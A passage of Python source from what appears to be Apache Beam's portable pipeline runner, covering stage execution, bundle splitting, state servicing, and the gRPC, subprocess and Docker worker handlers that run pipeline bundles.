input_for_callable, last_sent, deferred_inputs):
prev_stops = {}
for split in splits:
for delayed_application in split.residual_roots:
deferred_inputs[
input_for_callable(
delayed_application.application.ptransform_id,
delayed_application.application.input_id)
].append(delayed_application.application.element)
for channel_split in split.channel_splits:
coder_impl = get_input_coder_callable(channel_split.ptransform_id)
# TODO(SDF): This requires determanistic ordering of buffer iteration.
# TODO(SDF): The return split is in terms of indices. Ideally,
# a runner could map these back to actual positions to effectively
# describe the two "halves" of the now-split range. Even if we have
# to buffer each element we send (or at the very least a bit of
# metadata, like position, about each of them) this should be doable
# if they're already in memory and we are bounding the buffer size
# (e.g. to 10mb plus whatever is eagerly read from the SDK). In the
# case of non-split-points, we can either immediately replay the
# "non-split-position" elements or record them as we do the other
# delayed applications.
# Decode and recode to split the encoded buffer by element index.
all_elements = list(coder_impl.decode_all(b''.join(last_sent[
channel_split.ptransform_id])))
residual_elements = all_elements[
channel_split.first_residual_element : prev_stops.get(
channel_split.ptransform_id, len(all_elements)) + 1]
if residual_elements:
deferred_inputs[channel_split.ptransform_id].append(
coder_impl.encode_all(residual_elements))
prev_stops[
channel_split.ptransform_id] = channel_split.last_primary_element
@staticmethod
def _extract_stage_data_endpoints(
stage, pipeline_components, data_api_service_descriptor, pcoll_buffers):
# Returns maps of transform names to PCollection identifiers.
# Also mutates IO stages to point to the data ApiServiceDescriptor.
data_input = {}
data_side_input = {}
data_output = {}
for transform in stage.transforms:
if transform.spec.urn in (bundle_processor.DATA_INPUT_URN,
bundle_processor.DATA_OUTPUT_URN):
pcoll_id = transform.spec.payload
if transform.spec.urn == bundle_processor.DATA_INPUT_URN:
target = transform.unique_name, only_element(transform.outputs)
if pcoll_id == fn_api_runner_transforms.IMPULSE_BUFFER:
data_input[target] = _ListBuffer([ENCODED_IMPULSE_VALUE])
else:
data_input[target] = pcoll_buffers[pcoll_id]
coder_id = pipeline_components.pcollections[
only_element(transform.outputs.values())].coder_id
elif transform.spec.urn == bundle_processor.DATA_OUTPUT_URN:
target = transform.unique_name, only_element(transform.inputs)
data_output[target] = pcoll_id
coder_id = pipeline_components.pcollections[
only_element(transform.inputs.values())].coder_id
else:
raise NotImplementedError
data_spec = beam_fn_api_pb2.RemoteGrpcPort(coder_id=coder_id)
if data_api_service_descriptor:
data_spec.api_service_descriptor.url = (
data_api_service_descriptor.url)
transform.spec.payload = data_spec.SerializeToString()
elif transform.spec.urn in fn_api_runner_transforms.PAR_DO_URNS:
payload = proto_utils.parse_Bytes(
transform.spec.payload, beam_runner_api_pb2.ParDoPayload)
for tag, si in payload.side_inputs.items():
data_side_input[transform.unique_name, tag] = (
create_buffer_id(transform.inputs[tag]), si.access_pattern)
return data_input, data_side_input, data_output
def _run_stage(self,
worker_handler_factory,
pipeline_components,
stage,
pcoll_buffers,
safe_coders):
"""Run an individual stage.
Args:
worker_handler_factory: A ``callable`` that takes in an environment, and
returns a ``WorkerHandler`` class.
pipeline_components (beam_runner_api_pb2.Components): TODO
stage (fn_api_runner_transforms.Stage)
pcoll_buffers (collections.defaultdict of str: list): Mapping of
PCollection IDs to list that functions as buffer for the
``beam.PCollection``.
safe_coders (dict): TODO
"""
def iterable_state_write(values, element_coder_impl):
token = unique_name(None, 'iter').encode('ascii')
out = create_OutputStream()
for element in values:
element_coder_impl.encode_to_stream(element, out, True)
worker_handler.state.blocking_append(
beam_fn_api_pb2.StateKey(
runner=beam_fn_api_pb2.StateKey.Runner(key=token)),
out.get())
return token
worker_handler_list = worker_handler_factory(
stage.environment, self._num_workers)
# All worker_handlers share the same grpc server, so we can read grpc server
# info from any worker_handler and read from the first worker_handler.
worker_handler = next(iter(worker_handler_list))
context = pipeline_context.PipelineContext(
pipeline_components, iterable_state_write=iterable_state_write)
data_api_service_descriptor = worker_handler.data_api_service_descriptor()
logging.info('Running %s', stage.name)
data_input, data_side_input, data_output = self._extract_endpoints(
stage, pipeline_components, data_api_service_descriptor, pcoll_buffers)
process_bundle_descriptor = beam_fn_api_pb2.ProcessBundleDescriptor(
id=self._next_uid(),
transforms={transform.unique_name: transform
for transform in stage.transforms},
pcollections=dict(pipeline_components.pcollections.items()),
coders=dict(pipeline_components.coders.items()),
windowing_strategies=dict(
pipeline_components.windowing_strategies.items()),
environments=dict(pipeline_components.environments.items()))
if worker_handler.state_api_service_descriptor():
process_bundle_descriptor.state_api_service_descriptor.url = (
worker_handler.state_api_service_descriptor().url)
# Store the required side inputs into state so it is accessible for the
# worker when it runs this bundle.
self._store_side_inputs_in_state(worker_handler,
context,
pipeline_components,
data_side_input,
pcoll_buffers,
safe_coders)
def get_buffer(buffer_id):
"""Returns the buffer for a given (operation_type, PCollection ID).
For grouping-typed operations, we produce a ``_GroupingBuffer``. For
others, we produce a ``_ListBuffer``.
"""
kind, name = split_buffer_id(buffer_id)
if kind in ('materialize', 'timers'):
# If `buffer_id` is not a key in `pcoll_buffers`, it will be added by
# the `defaultdict`.
return pcoll_buffers[buffer_id]
elif kind == 'group':
# This is a grouping write, create a grouping buffer if needed.
if buffer_id not in pcoll_buffers:
original_gbk_transform = name
transform_proto = pipeline_components.transforms[
original_gbk_transform]
input_pcoll = only_element(list(transform_proto.inputs.values()))
output_pcoll = only_element(list(transform_proto.outputs.values()))
pre_gbk_coder = context.coders[safe_coders[
pipeline_components.pcollections[input_pcoll].coder_id]]
post_gbk_coder = context.coders[safe_coders[
pipeline_components.pcollections[output_pcoll].coder_id]]
windowing_strategy = context.windowing_strategies[
pipeline_components
.pcollections[output_pcoll].windowing_strategy_id]
pcoll_buffers[buffer_id] = _GroupingBuffer(
pre_gbk_coder, post_gbk_coder, windowing_strategy)
else:
# These should be the only two identifiers we produce for now,
# but special side input writes may go here.
raise NotImplementedError(buffer_id)
return pcoll_buffers[buffer_id]
def get_input_coder_impl(transform_id):
return context.coders[safe_coders[
beam_fn_api_pb2.RemoteGrpcPort.FromString(
process_bundle_descriptor.transforms[transform_id].spec.payload
).coder_id
]].get_impl()
self._run_bundle_multiple_times_for_testing(worker_handler_list,
process_bundle_descriptor,
data_input,
data_output,
get_input_coder_impl)
bundle_manager = ParallelBundleManager(
worker_handler_list, get_buffer, get_input_coder_impl,
process_bundle_descriptor, self._progress_frequency,
num_workers=self._num_workers)
result, splits = bundle_manager.process_bundle(data_input, data_output)
def input_for(ptransform_id, input_id):
input_pcoll = process_bundle_descriptor.transforms[
ptransform_id].inputs[input_id]
for read_id, proto in process_bundle_descriptor.transforms.items():
if (proto.spec.urn == bundle_processor.DATA_INPUT_URN
and input_pcoll in proto.outputs.values()):
return read_id
raise RuntimeError(
'No IO transform feeds %s' % ptransform_id)
last_result = result
last_sent = data_input
while True:
deferred_inputs = collections.defaultdict(_ListBuffer)
self._collect_written_timers_and_add_to_deferred_inputs(
context, pipeline_components, stage, get_buffer, deferred_inputs)
# Queue any process-initiated delayed bundle applications.
for delayed_application in last_result.process_bundle.residual_roots:
deferred_inputs[
input_for(
delayed_application.application.ptransform_id,
delayed_application.application.input_id)
].append(delayed_application.application.element)
# Queue any runner-initiated delayed bundle applications.
self._add_residuals_and_channel_splits_to_deferred_inputs(
splits, get_input_coder_impl, input_for, last_sent, deferred_inputs)
if deferred_inputs:
# The worker will be waiting on these inputs as well.
for other_input in data_input:
if other_input not in deferred_inputs:
deferred_inputs[other_input] = _ListBuffer([])
# TODO(robertwb): merge results
# We cannot split deferred_input until we include residual_roots to
# merged results. Without residual_roots, pipeline stops earlier and we
# may miss some data.
bundle_manager._num_workers = 1
bundle_manager._skip_registration = True
last_result, splits = bundle_manager.process_bundle(
deferred_inputs, data_output)
last_sent = deferred_inputs
result = beam_fn_api_pb2.InstructionResponse(
process_bundle=beam_fn_api_pb2.ProcessBundleResponse(
monitoring_infos=monitoring_infos.consolidate(
itertools.chain(
result.process_bundle.monitoring_infos,
last_result.process_bundle.monitoring_infos))),
error=result.error or last_result.error)
else:
break
return result
@staticmethod
def _extract_endpoints(stage,
pipeline_components,
data_api_service_descriptor,
pcoll_buffers):
"""Returns maps of transform names to PCollection identifiers.
Also mutates IO stages to point to the data ApiServiceDescriptor.
Args:
stage (fn_api_runner_transforms.Stage): The stage to extract endpoints
for.
pipeline_components (beam_runner_api_pb2.Components): Components of the
pipeline to include coders, transforms, PCollections, etc.
data_api_service_descriptor: A GRPC endpoint descriptor for data plane.
pcoll_buffers (dict): A dictionary containing buffers for PCollection
elements.
Returns:
A tuple of (data_input, data_side_input, data_output) dictionaries.
`data_input` is a dictionary mapping (transform_name, output_name) to a
PCollection buffer; `data_output` is a dictionary mapping
(transform_name, output_name) to a PCollection ID.
"""
data_input = {}
data_side_input = {}
data_output = {}
for transform in stage.transforms:
if transform.spec.urn in (bundle_processor.DATA_INPUT_URN,
bundle_processor.DATA_OUTPUT_URN):
pcoll_id = transform.spec.payload
if transform.spec.urn == bundle_processor.DATA_INPUT_URN:
if pcoll_id == fn_api_runner_transforms.IMPULSE_BUFFER:
data_input[transform.unique_name] = _ListBuffer(
[ENCODED_IMPULSE_VALUE])
else:
data_input[transform.unique_name] = pcoll_buffers[pcoll_id]
coder_id = pipeline_components.pcollections[
only_element(transform.outputs.values())].coder_id
elif transform.spec.urn == bundle_processor.DATA_OUTPUT_URN:
data_output[transform.unique_name] = pcoll_id
coder_id = pipeline_components.pcollections[
only_element(transform.inputs.values())].coder_id
else:
raise NotImplementedError
data_spec = beam_fn_api_pb2.RemoteGrpcPort(coder_id=coder_id)
if data_api_service_descriptor:
data_spec.api_service_descriptor.url = (
data_api_service_descriptor.url)
transform.spec.payload = data_spec.SerializeToString()
elif transform.spec.urn in fn_api_runner_transforms.PAR_DO_URNS:
payload = proto_utils.parse_Bytes(
transform.spec.payload, beam_runner_api_pb2.ParDoPayload)
for tag, si in payload.side_inputs.items():
data_side_input[transform.unique_name, tag] = (
create_buffer_id(transform.inputs[tag]), si.access_pattern)
return data_input, data_side_input, data_output
# These classes are used to interact with the worker.
class StateServicer(beam_fn_api_pb2_grpc.BeamFnStateServicer):
class CopyOnWriteState(object):
def __init__(self, underlying):
self._underlying = underlying
self._overlay = {}
def __getitem__(self, key):
if key in self._overlay:
return self._overlay[key]
else:
return FnApiRunner.StateServicer.CopyOnWriteList(
self._underlying, self._overlay, key)
def __delitem__(self, key):
self._overlay[key] = []
def commit(self):
self._underlying.update(self._overlay)
return self._underlying
class CopyOnWriteList(object):
def __init__(self, underlying, overlay, key):
self._underlying = underlying
self._overlay = overlay
self._key = key
def __iter__(self):
if self._key in self._overlay:
return iter(self._overlay[self._key])
else:
return iter(self._underlying[self._key])
def append(self, item):
if self._key not in self._overlay:
self._overlay[self._key] = list(self._underlying[self._key])
self._overlay[self._key].append(item)
def __init__(self):
self._lock = threading.Lock()
self._state = collections.defaultdict(list)
self._checkpoint = None
self._use_continuation_tokens = False
self._continuations = {}
def checkpoint(self):
assert self._checkpoint is None
self._checkpoint = self._state
self._state = FnApiRunner.StateServicer.CopyOnWriteState(self._state)
def commit(self):
self._state.commit()
self._state = self._checkpoint.commit()
self._checkpoint = None
def restore(self):
self._state = self._checkpoint
self._checkpoint = None
@contextlib.contextmanager
def process_instruction_id(self, unused_instruction_id):
yield
def blocking_get(self, state_key, continuation_token=None):
with self._lock:
full_state = self._state[self._to_key(state_key)]
if self._use_continuation_tokens:
# The token is "nonce:index".
if not continuation_token:
token_base = 'token_%x' % len(self._continuations)
self._continuations[token_base] = tuple(full_state)
return b'', '%s:0' % token_base
else:
token_base, index = continuation_token.split(':')
ix = int(index)
full_state = self._continuations[token_base]
if ix == len(full_state):
return b'', None
else:
return full_state[ix], '%s:%d' % (token_base, ix + 1)
else:
assert not continuation_token
return b''.join(full_state), None
def blocking_append(self, state_key, data):
with self._lock:
self._state[self._to_key(state_key)].append(data)
def blocking_clear(self, state_key):
with self._lock:
del self._state[self._to_key(state_key)]
@staticmethod
def _to_key(state_key):
return state_key.SerializeToString()
class GrpcStateServicer(beam_fn_api_pb2_grpc.BeamFnStateServicer):
def __init__(self, state):
self._state = state
def State(self, request_stream, context=None):
# Note that this eagerly mutates state, assuming any failures are fatal.
# Thus it is safe to ignore instruction_reference.
for request in request_stream:
request_type = request.WhichOneof('request')
if request_type == 'get':
data, continuation_token = self._state.blocking_get(
request.state_key, request.get.continuation_token)
yield beam_fn_api_pb2.StateResponse(
id=request.id,
get=beam_fn_api_pb2.StateGetResponse(
data=data, continuation_token=continuation_token))
elif request_type == 'append':
self._state.blocking_append(request.state_key, request.append.data)
yield beam_fn_api_pb2.StateResponse(
id=request.id,
append=beam_fn_api_pb2.StateAppendResponse())
elif request_type == 'clear':
self._state.blocking_clear(request.state_key)
yield beam_fn_api_pb2.StateResponse(
id=request.id,
clear=beam_fn_api_pb2.StateClearResponse())
else:
raise NotImplementedError('Unknown state request: %s' % request_type)
class SingletonStateHandlerFactory(sdk_worker.StateHandlerFactory):
"""A singleton cache for a StateServicer."""
def __init__(self, state_handler):
self._state_handler = state_handler
def create_state_handler(self, api_service_descriptor):
"""Returns the singleton state handler."""
return self._state_handler
def close(self):
"""Does nothing."""
pass
class WorkerHandler(object):
"""worker_handler for a worker.
It provides utilities to start / stop the worker, provision any resources for
it, as well as provide descriptors for the data, state and logging APIs for
it.
"""
_registered_environments = {}
_worker_id_counter = -1
_lock = threading.Lock()
def __init__(
self, control_handler, data_plane_handler, state, provision_info):
"""Initialize a WorkerHandler.
Args:
control_handler:
data_plane_handler (data_plane.DataChannel):
state:
provision_info:
"""
self.control_handler = control_handler
self.data_plane_handler = data_plane_handler
self.state = state
self.provision_info = provision_info
with WorkerHandler._lock:
WorkerHandler._worker_id_counter += 1
self.worker_id = 'worker_%s' % WorkerHandler._worker_id_counter
def close(self):
self.stop_worker()
def start_worker(self):
raise NotImplementedError
def stop_worker(self):
raise NotImplementedError
def data_api_service_descriptor(self):
raise NotImplementedError
def state_api_service_descriptor(self):
raise NotImplementedError
def logging_api_service_descriptor(self):
raise NotImplementedError
@classmethod
def register_environment(cls, urn, payload_type):
def wrapper(constructor):
cls._registered_environments[urn] = constructor, payload_type
return constructor
return wrapper
@classmethod
def create(cls, environment, state, provision_info, grpc_server):
constructor, payload_type = cls._registered_environments[environment.urn]
return constructor(
proto_utils.parse_Bytes(environment.payload, payload_type),
state,
provision_info,
grpc_server)
@WorkerHandler.register_environment(python_urns.EMBEDDED_PYTHON, None)
class EmbeddedWorkerHandler(WorkerHandler):
"""An in-memory worker_handler for fn API control, state and data planes."""
def __init__(self, unused_payload, state, provision_info,
unused_grpc_server=None):
super(EmbeddedWorkerHandler, self).__init__(
self, data_plane.InMemoryDataChannel(), state, provision_info)
self.control_conn = self
self.data_conn = self.data_plane_handler
self.worker = sdk_worker.SdkWorker(
sdk_worker.BundleProcessorCache(
FnApiRunner.SingletonStateHandlerFactory(self.state),
data_plane.InMemoryDataChannelFactory(
self.data_plane_handler.inverse()),
{}))
self._uid_counter = 0
def push(self, request):
if not request.instruction_id:
self._uid_counter += 1
request.instruction_id = 'control_%s' % self._uid_counter
response = self.worker.do_instruction(request)
return ControlFuture(request.instruction_id, response)
def start_worker(self):
pass
def stop_worker(self):
self.worker.stop()
def done(self):
pass
def data_api_service_descriptor(self):
return None
def state_api_service_descriptor(self):
return None
def logging_api_service_descriptor(self):
return None
class BasicLoggingService(beam_fn_api_pb2_grpc.BeamFnLoggingServicer):
LOG_LEVEL_MAP = {
beam_fn_api_pb2.LogEntry.Severity.CRITICAL: logging.CRITICAL,
beam_fn_api_pb2.LogEntry.Severity.ERROR: logging.ERROR,
beam_fn_api_pb2.LogEntry.Severity.WARN: logging.WARNING,
beam_fn_api_pb2.LogEntry.Severity.NOTICE: logging.INFO + 1,
beam_fn_api_pb2.LogEntry.Severity.INFO: logging.INFO,
beam_fn_api_pb2.LogEntry.Severity.DEBUG: logging.DEBUG,
beam_fn_api_pb2.LogEntry.Severity.TRACE: logging.DEBUG - 1,
beam_fn_api_pb2.LogEntry.Severity.UNSPECIFIED: logging.NOTSET,
}
def Logging(self, log_messages, context=None):
yield beam_fn_api_pb2.LogControl()
for log_message in log_messages:
for log in log_message.log_entries:
logging.log(self.LOG_LEVEL_MAP[log.severity], str(log))
class BasicProvisionService(
beam_provision_api_pb2_grpc.ProvisionServiceServicer):
def __init__(self, info):
self._info = info
def GetProvisionInfo(self, request, context=None):
return beam_provision_api_pb2.GetProvisionInfoResponse(
info=self._info)
class GrpcServer(object):
_DEFAULT_SHUTDOWN_TIMEOUT_SECS = 5
def __init__(self, state, provision_info):
self.state = state
self.provision_info = provision_info
self.control_server = grpc.server(
futures.ThreadPoolExecutor(max_workers=10))
self.control_port = self.control_server.add_insecure_port('[::]:0')
self.control_address = 'localhost:%s' % self.control_port
# Options to have no limits (-1) on the size of the messages
# received or sent over the data plane. The actual buffer size
# is controlled in a layer above.
no_max_message_sizes = [("grpc.max_receive_message_length", -1),
("grpc.max_send_message_length", -1)]
self.data_server = grpc.server(
futures.ThreadPoolExecutor(max_workers=10),
options=no_max_message_sizes)
self.data_port = self.data_server.add_insecure_port('[::]:0')
self.state_server = grpc.server(
futures.ThreadPoolExecutor(max_workers=10),
options=no_max_message_sizes)
self.state_port = self.state_server.add_insecure_port('[::]:0')
self.control_handler = BeamFnControlServicer()
beam_fn_api_pb2_grpc.add_BeamFnControlServicer_to_server(
self.control_handler, self.control_server)
# If we have provision info, serve these off the control port as well.
if self.provision_info:
if self.provision_info.provision_info:
provision_info = self.provision_info.provision_info
if not provision_info.worker_id:
provision_info = copy.copy(provision_info)
provision_info.worker_id = str(uuid.uuid4())
beam_provision_api_pb2_grpc.add_ProvisionServiceServicer_to_server(
BasicProvisionService(self.provision_info.provision_info),
self.control_server)
if self.provision_info.artifact_staging_dir:
m = beam_artifact_api_pb2_grpc
m.add_ArtifactRetrievalServiceServicer_to_server(
artifact_service.BeamFilesystemArtifactService(
self.provision_info.artifact_staging_dir),
self.control_server)
self.data_plane_handler = data_plane.BeamFnDataServicer()
beam_fn_api_pb2_grpc.add_BeamFnDataServicer_to_server(
self.data_plane_handler, self.data_server)
beam_fn_api_pb2_grpc.add_BeamFnStateServicer_to_server(
FnApiRunner.GrpcStateServicer(state),
self.state_server)
self.logging_server = grpc.server(
futures.ThreadPoolExecutor(max_workers=2),
options=no_max_message_sizes)
self.logging_port = self.logging_server.add_insecure_port('[::]:0')
beam_fn_api_pb2_grpc.add_BeamFnLoggingServicer_to_server(
BasicLoggingService(),
self.logging_server)
logging.info('starting control server on port %s', self.control_port)
logging.info('starting data server on port %s', self.data_port)
logging.info('starting state server on port %s', self.state_port)
logging.info('starting logging server on port %s', self.logging_port)
self.logging_server.start()
self.state_server.start()
self.data_server.start()
self.control_server.start()
def close(self):
self.control_handler.done()
to_wait = [
self.control_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS),
self.data_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS),
self.state_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS),
self.logging_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS)
]
for w in to_wait:
w.wait()
class GrpcWorkerHandler(WorkerHandler):
"""An grpc based worker_handler for fn API control, state and data planes."""
def __init__(self, state, provision_info, grpc_server):
self._grpc_server = grpc_server
super(GrpcWorkerHandler, self).__init__(
self._grpc_server.control_handler, self._grpc_server.data_plane_handler,
state, provision_info)
self.state = state
self.control_address = self._grpc_server.control_address
self.control_conn = self._grpc_server.control_handler \
.get_conn_by_worker_id(self.worker_id)
self.data_conn = self._grpc_server.data_plane_handler \
.get_conn_by_worker_id(self.worker_id)
def data_api_service_descriptor(self):
return endpoints_pb2.ApiServiceDescriptor(
url='localhost:%s' % self._grpc_server.data_port)
def state_api_service_descriptor(self):
return endpoints_pb2.ApiServiceDescriptor(
url='localhost:%s' % self._grpc_server.state_port)
def logging_api_service_descriptor(self):
return endpoints_pb2.ApiServiceDescriptor(
url='localhost:%s' % self._grpc_server.logging_port)
def close(self):
self.control_conn.close()
self.data_conn.close()
super(GrpcWorkerHandler, self).close()
@WorkerHandler.register_environment(
common_urns.environments.EXTERNAL.urn, beam_runner_api_pb2.ExternalPayload)
class ExternalWorkerHandler(GrpcWorkerHandler):
def __init__(self, external_payload, state, provision_info, grpc_server):
super(ExternalWorkerHandler, self).__init__(state, provision_info,
grpc_server)
self._external_payload = external_payload
def start_worker(self):
stub = beam_fn_api_pb2_grpc.BeamFnExternalWorkerPoolStub(
GRPCChannelFactory.insecure_channel(
self._external_payload.endpoint.url))
response = stub.NotifyRunnerAvailable(
beam_fn_api_pb2.NotifyRunnerAvailableRequest(
worker_id=self.worker_id,
control_endpoint=endpoints_pb2.ApiServiceDescriptor(
url=self.control_address),
logging_endpoint=self.logging_api_service_descriptor(),
params=self._external_payload.params))
if response.error:
raise RuntimeError("Error starting worker: %s" % response.error)
def stop_worker(self):
pass
@WorkerHandler.register_environment(python_urns.EMBEDDED_PYTHON_GRPC, bytes)
class EmbeddedGrpcWorkerHandler(GrpcWorkerHandler):
def __init__(self, num_workers_payload, state, provision_info, grpc_server):
super(EmbeddedGrpcWorkerHandler, self).__init__(state, provision_info,
grpc_server)
self._num_threads = int(num_workers_payload) if num_workers_payload else 1
def start_worker(self):
self.worker = sdk_worker.SdkHarness(
self.control_address, worker_count=self._num_threads,
worker_id=self.worker_id)
self.worker_thread = threading.Thread(
name='run_worker', target=self.worker.run)
self.worker_thread.daemon = True
self.worker_thread.start()
def stop_worker(self):
self.worker_thread.join()
@WorkerHandler.register_environment(python_urns.SUBPROCESS_SDK, bytes)
class SubprocessSdkWorkerHandler(GrpcWorkerHandler):
def __init__(self, worker_command_line, state, provision_info, grpc_server):
super(SubprocessSdkWorkerHandler, self).__init__(state, provision_info,
grpc_server)
self._worker_command_line = worker_command_line
def start_worker(self):
from apache_beam.runners.portability import local_job_service
self.worker = local_job_service.SubprocessSdkWorker(
self._worker_command_line, self.control_address, self.worker_id)
self.worker_thread = threading.Thread(
name='run_worker', target=self.worker.run)
self.worker_thread.start()
def stop_worker(self):
self.worker_thread.join()
@WorkerHandler.register_environment(common_urns.environments.DOCKER.urn,
beam_runner_api_pb2.DockerPayload)
class DockerSdkWorkerHandler(GrpcWorkerHandler):
def __init__(self, payload, state, provision_info, grpc_server):
super(DockerSdkWorkerHandler, self).__init__(state, provision_info,
grpc_server)
self._container_image = payload.container_image
self._container_id = None
def start_worker(self):
try:
subprocess.check_call(['docker', 'pull', self._container_image])
except Exception:
logging.info('Unable to pull image %s' % self._container_image)
self._container_id = subprocess.check_output(
['docker',
'run',
'-d',
# TODO: credentials
'--network=host',
self._container_image,
'--id=%s' % uuid.uuid4(),
'--logging_endpoint=%s' % self.logging_api_service_descriptor().url,
'--control_endpoint=%s' % self.control_address,
'--artifact_endpoint=%s' % self.control_address,
'--provision_endpoint=%s' % self.control_address,
]).strip()
while True:
logging.info('Waiting for docker to start up...')
status = subprocess.check_output([
'docker',
'inspect',
'-f',
'{{.State.Status}}',
self._container_id]).strip()
if status == 'running':
break
elif status in ('dead', 'exited'):
subprocess.call([
'docker',
'container',
'logs',
self._container_id])
raise RuntimeError('SDK failed to start.')
time.sleep(1)
def stop_worker(self):
if self._container_id:
subprocess.call([
'docker',
'kill',
self._container_id])
class WorkerHandlerManager(object):
def __init__(self, environments, job_provision_info=None):
self._environments = environments
self._job_provision_info = job_provision_info
self._cached_handlers = collections.defaultdict(list)
self._state = FnApiRunner.StateServicer() # rename?
self._grpc_server = None
def get_worker_handlers(self, environment_id, num_workers):
if environment_id is None:
# Any environment will do, pick one arbitrarily.
environment_id = next(iter(self._environments.keys()))
environment = self._environments[environment_id]
# assume it's using grpc if environment is not EMBEDDED_PYTHON.
if environment.urn != python_urns.EMBEDDED_PYTHON and \
self._grpc_server is None:
self._grpc_server = GrpcServer(self._state, self._job_provision_info)
worker_handler_list = self._cached_handlers[environment_id]
if len(worker_handler_list) < num_workers:
for _ in range(len(worker_handler_list), num_workers):
worker_handler = WorkerHandler.create(
environment, self._state, self._job_provision_info,
self._grpc_server)
self._cached_handlers[environment_id].append(worker_handler)
worker_handler.start_worker()
return self._cached_handlers[environment_id][:num_workers]
def close_all(self):
for worker_handler_list in self._cached_handlers.values():
for worker_handler in set(worker_handler_list):
try:
worker_handler.close()
except Exception:
logging.error("Error closing worker_handler %s" % worker_handler,
exc_info=True)
self._cached_handlers = {}
if self._grpc_server is not None:
self._grpc_server.close()
self._grpc_server = None
class ExtendedProvisionInfo(object):
def __init__(self, provision_info=None, artifact_staging_dir=None):
self.provision_info = (
provision_info or beam_provision_api_pb2.ProvisionInfo())
self.artifact_staging_dir = artifact_staging_dir
_split_managers = []
@contextlib.contextmanager
def split_manager(stage_name, split_manager):
"""Registers a split manager to control the flow of elements to a given stage.
Used for testing.
A split manager should be a coroutine yielding desired split fractions,
receiving the corresponding split results. Currently, only one input is
supported.
"""
try:
_split_managers.append((stage_name, split_manager))
yield
finally:
_split_managers.pop()
class BundleManager(object):
"""Manages the execution of a bundle from the runner-side.
This class receives a bundle descriptor, and performs the following tasks:
- Registration of the bundle with the worker.
- Splitting of the bundle
- Setting up any other bundle requirements (e.g. side inputs).
- Submitting the bundle to worker for execution
- Passing bundle input data to the worker
- Collecting bundle output data from the worker
- Finalizing the bundle.
"""
_uid_counter = 0
_lock = threading.Lock()
def __init__(
self, worker_handler_list, get_buffer, get_input_coder_impl,
bundle_descriptor, progress_frequency=None, skip_registration=False):
"""Set up a bundle manager.
Args:
worker_handler_list
get_buffer (Callable[[str], list])
get_input_coder_impl (Callable[[str], Coder])
bundle_descriptor (beam_fn_api_pb2.ProcessBundleDescriptor)
progress_frequency
skip_registration
"""
self._worker_handler_list = worker_handler_list
self._get_buffer = get_buffer
self._get_input_coder_impl = get_input_coder_impl
self._bundle_descriptor = bundle_descriptor
self._registered = skip_registration
self._progress_frequency = progress_frequency
self._worker_handler = None
def _send_input_to_worker(self,
process_bundle_id,
read_transform_id,
byte_streams):
data_out = self._worker_handler.data_conn.output_stream(
process_bundle_id, read_transform_id)
for byte_stream in byte_streams:
data_out.write(byte_stream)
data_out.close()
def _register_bundle_descriptor(self):
if self._registered:
registration_future = None
else:
process_bundle_registration = beam_fn_api_pb2.InstructionRequest(
register=beam_fn_api_pb2.RegisterRequest(
process_bundle_descriptor=[self._bundle_descriptor]))
registration_future = self._worker_handler.control_conn.push(
process_bundle_registration)
self._registered = True
return registration_future
def _select_split_manager(self):
"""TODO(pabloem) WHAT DOES THIS DO"""
unique_names = set(
t.unique_name for t in self._bundle_descriptor.transforms.values())
for stage_name, candidate in reversed(_split_managers):
if (stage_name in unique_names
or (stage_name + '/Process') in unique_names):
split_manager = candidate
break
else:
split_manager = None
return split_manager
def _generate_splits_for_testing(self,
split_manager,
inputs,
process_bundle_id):
split_results = []
read_transform_id, buffer_data = only_element(inputs.items())
byte_stream = b''.join(buffer_data)
num_elements = len(list(
self._get_input_coder_impl(read_transform_id).decode_all(byte_stream)))
# Start the split manager in case it wants to set any breakpoints.
split_manager_generator = split_manager(num_elements)
try:
split_fraction = next(split_manager_generator)
done = False
except StopIteration:
done = True
# Send all the data.
self._send_input_to_worker(
process_bundle_id, read_transform_id, [byte_stream])
# Execute the requested splits.
while not done:
if split_fraction is None:
split_result = None
else:
split_request = beam_fn_api_pb2.InstructionRequest(
process_bundle_split=
beam_fn_api_pb2.ProcessBundleSplitRequest(
instruction_reference=process_bundle_id,
desired_splits={
read_transform_id:
beam_fn_api_pb2.ProcessBundleSplitRequest.DesiredSplit(
fraction_of_remainder=split_fraction,
estimated_input_elements=num_elements)
}))
split_response = self._worker_handler.control_conn.push(
split_request).get()
for t in (0.05, 0.1, 0.2):
waiting = ('Instruction not running', 'not yet scheduled')
if any(msg in split_response.error for msg in waiting):
time.sleep(t)
split_response = self._worker_handler.control_conn.push(
split_request).get()
if 'Unknown process bundle' in split_response.error:
# It may have finished too fast.
split_result = None
elif split_response.error:
raise RuntimeError(split_response.error)
else:
split_result = split_response.process_bundle_split
split_results.append(split_result)
try:
split_fraction = split_manager_generator.send(split_result)
except StopIteration:
break
return split_results
def process_bundle(self, inputs, expected_outputs):
# Unique id for the instruction processing this bundle.
with BundleManager._lock:
BundleManager._uid_counter += 1
process_bundle_id = 'bundle_%s' % BundleManager._uid_counter
self._worker_handler = self._worker_handler_list[
BundleManager._uid_counter % len(self._worker_handler_list)]
# Register the bundle descriptor, if needed - noop if already registered.
registration_future = self._register_bundle_descriptor()
# Check that the bundle was successfully registered.
if registration_future and registration_future.get().error:
raise RuntimeError(registration_future.get().error)
split_manager = self._select_split_manager()
if not split_manager:
# If there is no split_manager, write all input data to the channel.
for transform_id, elements in inputs.items():
self._send_input_to_worker(
process_bundle_id, transform_id, elements)
# Actually start the bundle.
process_bundle_req = beam_fn_api_pb2.InstructionRequest(
instruction_id=process_bundle_id,
process_bundle=beam_fn_api_pb2.ProcessBundleRequest(
process_bundle_descriptor_reference=self._bundle_descriptor.id))
result_future = self._worker_handler.control_conn.push(process_bundle_req)
split_results = []
with ProgressRequester(
self._worker_handler, process_bundle_id, self._progress_frequency):
if split_manager:
split_results = self._generate_splits_for_testing(
split_manager, inputs, process_bundle_id)
# Gather all output data.
for output in self._worker_handler.data_conn.input_elements(
process_bundle_id,
expected_outputs.keys(),
abort_callback=lambda: (result_future.is_done()
and result_future.get().error)):
if output.ptransform_id in expected_outputs:
with BundleManager._lock:
self._get_buffer(
expected_outputs[output.ptransform_id]).append(output.data)
logging.debug('Wait for the bundle %s to finish.' % process_bundle_id)
result = result_future.get()
if result.error:
raise RuntimeError(result.error)
if result.process_bundle.requires_finalization:
finalize_request = beam_fn_api_pb2.InstructionRequest(
finalize_bundle=
beam_fn_api_pb2.FinalizeBundleRequest(
